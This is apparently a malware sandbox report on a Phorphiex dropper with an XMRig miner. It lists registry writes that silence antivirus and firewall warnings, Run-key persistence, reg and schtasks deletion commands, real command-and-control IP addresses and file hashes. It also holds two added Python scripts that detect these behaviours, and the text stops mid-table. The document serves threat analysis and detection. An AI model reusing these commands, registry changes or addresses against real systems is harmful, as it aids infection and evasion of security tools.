Analysis Overview
SHA256
a3172e45bb1824fa625a04ff1d7e08617de13309ba9d31fb6b03ec9a921f345b
Threat Level: Known bad
The file 8051496142.zip was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
xmrig
Windows security bypass
Phorphiex
XMRig Miner payload
Executes dropped EXE
UPX packed file
Blocklisted process makes network request
Downloads MZ/PE file
Windows security modification
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-28 09:11
Signatures
Phorphiex family
Analysis: behavioral12
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
"C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe"
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4608 -ip 4608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | | tcp |
| US | 20.42.65.89:443 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/4208-132-0x0000000000860000-0x0000000000881000-memory.dmp
memory/4608-133-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/4608-136-0x0000000000400000-0x000000000045D000-memory.dmp
memory/4208-137-0x0000000000860000-0x0000000000881000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\88266847.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winuedrvs.exe" | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
| File created | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
"C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe"
C:\Users\Admin\AppData\Local\Temp\960721624.scr
C:\Users\Admin\AppData\Local\Temp\960721624.scr
C:\Windows\winuedrvs.exe
C:\Windows\winuedrvs.exe
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\88266847.exe
C:\Users\Admin\AppData\Local\Temp\88266847.exe
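The behavioral16 signatures and process tree above give a compact picture of how this Phorphiex dropper settles in: 960721624.scr writes a copy of itself to C:\Windows\winuedrvs.exe (the two files share the same hashes in the Files section) and registers it under the HKLM Run key as "Windows Settings"; the copy then sets the legacy Security Center override and DisableNotify values to 1 so Windows stops warning that antivirus, firewall and updates are off; and cmd.exe is used to delete a Run value and a scheduled task named "User Configuration" that nothing in this run created. The detection logic below is an added example written for this page, not part of the sandbox report or of any vendor's code. It runs over constructed telemetry events (dictionaries modeled on the rows above, not real logs); the regexes, the two-value threshold for Security Center tampering and the ATT&CK mappings are the editor's choices.

```python
"""Flag Phorphiex-style persistence, Security Center tampering and
persistence removal over constructed endpoint telemetry (not real logs)."""
import re
from collections import defaultdict

# Legacy Windows Security Center values that suppress the AV / firewall /
# update warnings. A cluster of them written to 1 by one process is tampering.
SECURITY_CENTER_VALUES = {
    "AntiVirusOverride", "AntiVirusDisableNotify",
    "FirewallOverride", "FirewallDisableNotify",
    "UpdatesOverride", "UpdatesDisableNotify",
    "AntiSpywareOverride",
}
SECURITY_CENTER_KEY = re.compile(r"\\Microsoft\\Security Center$", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
# An autostart entry pointing at an executable directly under C:\Windows
# (not a subdirectory) is unusual; the sample dropped winuedrvs.exe there.
WINDOWS_ROOT_EXE = re.compile(r'^"?[A-Za-z]:\\Windows\\[^\\]+\.(exe|scr)"?$', re.I)
# Removal of an existing Run value / scheduled task via reg.exe or schtasks.
REG_DELETE_RUN = re.compile(r'reg(\.exe)?\s+delete\s+"?HK(CU|LM)\\.*\\CurrentVersion\\Run"?\s+/v', re.I)
SCHTASKS_DELETE = re.compile(r"schtasks(\.exe)?\s+/delete\s", re.I)


def analyze(events):
    """events: iterable of dicts with kind in {"reg_set", "proc_create"}.
    Returns a list of (technique_id, process, detail) findings."""
    findings = []
    sc_hits = defaultdict(set)  # process -> Security Center values set to 1
    for ev in events:
        if ev["kind"] == "reg_set":
            key, name, data = ev["key"], ev["name"], str(ev["data"])
            if SECURITY_CENTER_KEY.search(key) and name in SECURITY_CENTER_VALUES and data == "1":
                sc_hits[ev["process"]].add(name)
            # Sandbox output escapes backslashes ("C:\\Windows\\..."); normalise.
            elif RUN_KEY.search(key) and WINDOWS_ROOT_EXE.match(data.replace("\\\\", "\\")):
                findings.append(("T1547.001", ev["process"], f"Run\\{name} -> {data}"))
        elif ev["kind"] == "proc_create":
            cmd = ev["cmdline"]
            if REG_DELETE_RUN.search(cmd) or SCHTASKS_DELETE.search(cmd):
                findings.append(("T1070.009", ev["process"], cmd))
    for proc, names in sc_hits.items():
        if len(names) >= 2:  # one stray write is noise; a cluster is tampering
            findings.append(("T1562.001", proc, ", ".join(sorted(names))))
    return findings


# Constructed events mirroring the report's behavioral16 rows, plus one
# benign Run entry as a control. Not captured telemetry.
SAMPLE_EVENTS = [
    {"kind": "reg_set", "process": r"C:\Windows\winuedrvs.exe",
     "key": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center",
     "name": n, "data": 1}
    for n in ("FirewallOverride", "FirewallDisableNotify", "AntiVirusOverride",
              "AntiVirusDisableNotify", "UpdatesOverride", "UpdatesDisableNotify",
              "AntiSpywareOverride")
] + [
    {"kind": "reg_set", "process": r"C:\Users\Admin\AppData\Local\Temp\960721624.scr",
     "key": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run",
     "name": "Windows Settings", "data": r"C:\Windows\winuedrvs.exe"},
    {"kind": "proc_create", "process": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f'},
    {"kind": "proc_create", "process": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"'},
    {"kind": "reg_set", "process": r"C:\Program Files\Vendor\app.exe",
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "VendorApp", "data": r"C:\Program Files\Vendor\app.exe"},
]

if __name__ == "__main__":
    for tid, proc, detail in analyze(SAMPLE_EVENTS):
        print(f"{tid}  {proc}\n    {detail}")
```

On the constructed events this yields four findings: the Run key pointing into C:\Windows, the two persistence-removal command lines, and a single T1562.001 finding aggregating all seven Security Center values; the benign VendorApp entry is ignored. In production the same logic maps onto Sysmon Event ID 13 (registry value set) and Event ID 1 (process create), with the process image and command line fields in place of the dictionary keys used here.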
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 8.238.23.254:80 | | tcp |
| NL | 8.238.23.254:80 | | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 80.210.171.1:40500 | | tcp |
| YE | 78.137.81.157:40500 | | udp |
| IR | 151.238.216.247:40500 | | udp |
| DE | 51.116.253.170:443 | | tcp |
| YE | 178.130.100.100:40500 | | udp |
| KG | 212.112.116.198:40500 | | udp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| IR | 2.185.65.140:40500 | | udp |
| YE | 94.26.223.89:40500 | | udp |
| YE | 134.35.222.123:40500 | | tcp |
| VE | 201.210.42.111:40500 | | udp |
| IR | 31.56.143.2:40500 | | udp |
| US | 93.184.220.29:80 | | tcp |
| YE | 80.253.191.92:40500 | | udp |
| TJ | 79.170.184.150:40500 | | udp |
| IR | 5.219.189.83:40500 | | udp |
| AF | 149.54.15.174:40500 | | tcp |
| IR | 2.185.253.170:40500 | | udp |
| IR | 31.59.145.163:40500 | | udp |
| CN | 117.31.176.154:40500 | | udp |
| MZ | 197.218.156.186:40500 | | tcp |
| UZ | 217.30.163.15:40500 | | udp |
| IR | 2.183.181.182:40500 | | udp |
| KZ | 84.240.255.178:40500 | | udp |
| IR | 80.210.56.154:40500 | | udp |
| YE | 134.35.228.137:40500 | | udp |
| IR | 188.159.128.42:40500 | | tcp |
| YE | 109.74.35.210:40500 | | udp |
| IR | 2.185.155.13:40500 | | udp |
| PK | 116.71.58.186:40500 | | udp |
| IR | 5.239.202.114:40500 | | udp |
| IR | 80.191.71.116:40500 | | udp |
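The Network table above mixes three kinds of traffic: Windows Update and CDN background noise (www.update.microsoft.com, 93.184.x.x, 8.238.x.x), repeated HTTP connections to 185.215.113.66 where the Domain column holds the bare IP (the request named the server by address rather than by hostname, consistent with a hard-coded check-in address), and dozens of short TCP and UDP flows to port 40500 on addresses spread across IR, YE, KG, VE and other countries. The script below is an added example, not part of the report, that parses rows in this table's pipe format, including rows where the empty Domain cell was dropped and Proto shifted left and a last row that lost its trailing pipe, and separates the hard-coded check-in endpoints from the many-destination port fan-out. The embedded rows are a constructed subset copied from the table; the fan-out threshold and the IP-literal heuristic are the editor's assumptions.

```python
"""Summarise a sandbox report's Network table: split the HTTP check-ins to
hard-coded IPs from the many-destination traffic on one odd port.
SAMPLE_ROWS is a constructed subset of the report's table."""
import ipaddress
from collections import defaultdict

SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 8.238.23.254:80 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 80.210.171.1:40500 | tcp | |
| YE | 78.137.81.157:40500 | udp | |
| IR | 151.238.216.247:40500 | udp | |
| KG | 212.112.116.198:40500 | udp | |
| VE | 201.210.42.111:40500 | udp | |
| IR | 80.191.71.116:40500 | udp
"""

PROTOS = {"tcp", "udp"}


def parse_rows(text):
    """Yield (country, ip, port, domain, proto) per data row.
    Tolerates the extraction quirk where an empty Domain cell is dropped and
    Proto shifts left, and a row that is missing its trailing pipe."""
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 2 or cells[0] == "Country":
            continue  # blank or header row
        country, dest = cells[0], cells[1]
        rest = [c for c in cells[2:] if c]
        # Whatever remains is either a protocol token or a domain/host value.
        proto = next((c for c in rest if c.lower() in PROTOS), "")
        domain = next((c for c in rest if c.lower() not in PROTOS), "")
        ip, port = dest.rsplit(":", 1)
        yield country, ip, int(port), domain, proto


def is_ip_literal(value):
    """True when the Domain cell is a bare IPv4/IPv6 address, not a hostname."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def summarize(text, fanout_threshold=5, min_countries=3):
    """Return {'hardcoded_c2': [...], 'fanout_ports': {port: n_destinations}}.
    A port counts as fan-out when it sees at least `fanout_threshold` distinct
    destinations spread over at least `min_countries` countries (assumed
    thresholds; tune to the sandbox run length)."""
    per_port = defaultdict(set)
    countries = defaultdict(set)
    hardcoded = set()
    for country, ip, port, domain, _proto in parse_rows(text):
        if domain and is_ip_literal(domain):
            hardcoded.add(f"{ip}:{port}")
        per_port[port].add(ip)
        countries[port].add(country)
    fanout = {
        port: len(ips) for port, ips in per_port.items()
        if len(ips) >= fanout_threshold and len(countries[port]) >= min_countries
    }
    return {"hardcoded_c2": sorted(hardcoded), "fanout_ports": fanout}


if __name__ == "__main__":
    result = summarize(SAMPLE_ROWS)
    print("hard-coded check-in endpoints:", result["hardcoded_c2"])
    print("fan-out ports (port -> distinct destinations):", result["fanout_ports"])
```

On the embedded subset the check-in endpoint is 185.215.113.66:80 and the only fan-out port is 40500 with six distinct destinations; port 80 stays below the threshold because its three destinations are CDN and C2 noise. Run against the full table from this report the same logic isolates the 40500 peer set, which is the part worth blocking at egress independent of the C2 address.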
Files
memory/4296-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\960721624.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/2744-135-0x0000000000000000-mapping.dmp
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/4720-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/4720-141-0x0000000000D70000-0x0000000000D76000-memory.dmp
memory/2156-142-0x0000000000000000-mapping.dmp
memory/4720-144-0x00007FFB54350000-0x00007FFB54E11000-memory.dmp
memory/4728-143-0x0000000000000000-mapping.dmp
memory/3684-145-0x0000000000000000-mapping.dmp
memory/4124-146-0x0000000000000000-mapping.dmp
memory/4720-147-0x00007FFB54350000-0x00007FFB54E11000-memory.dmp
memory/4876-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\88266847.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral20
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
134s
Max time network
146s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe | N/A |
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
"C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.238.20.126:80 | | tcp |
| US | 8.247.210.126:80 | | tcp |
| US | 20.42.65.84:443 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 93.184.220.29:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\118228510.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winopdvcs.exe" | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
| File created | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
"C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"
C:\Windows\winopdvcs.exe
C:\Windows\winopdvcs.exe
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\118228510.exe
C:\Users\Admin\AppData\Local\Temp\118228510.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 151.235.107.162:40500 | | tcp |
| IR | 91.185.136.105:40500 | | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 5.237.73.222:40500 | | udp |
| UZ | 217.30.172.154:40500 | | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| KG | 212.112.115.77:40500 | | udp |
| MX | 187.209.96.104:40500 | | udp |
| UZ | 213.230.127.141:40500 | | udp |
| IN | 117.214.84.184:40500 | | tcp |
| MZ | 197.218.143.74:40500 | | udp |
| BR | 186.206.150.225:40500 | | udp |
| ID | 111.94.49.175:40500 | | udp |
| IN | 115.96.111.129:40500 | | udp |
| IR | 188.159.25.26:40500 | | udp |
| MX | 187.209.96.104:40500 | | tcp |
| IR | 37.202.193.26:40500 | | udp |
| IN | 117.212.116.115:40500 | | udp |
| YE | 78.137.85.114:40500 | | udp |
| RU | 178.185.103.45:40500 | | udp |
| SY | 185.151.151.218:40500 | | tcp |
| IR | 31.58.66.68:40500 | | udp |
| IR | 151.243.148.106:40500 | | udp |
| MZ | 197.218.141.232:40500 | | udp |
| IR | 2.182.248.225:40500 | | udp |
| IR | 2.179.17.92:40500 | | udp |
| DZ | 197.205.32.57:40500 | | udp |
| RU | 31.8.35.23:40500 | | tcp |
| IR | 2.183.175.119:40500 | | udp |
| TJ | 109.74.67.96:40500 | | udp |
Files
memory/1724-54-0x0000000074B51000-0x0000000074B53000-memory.dmp
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
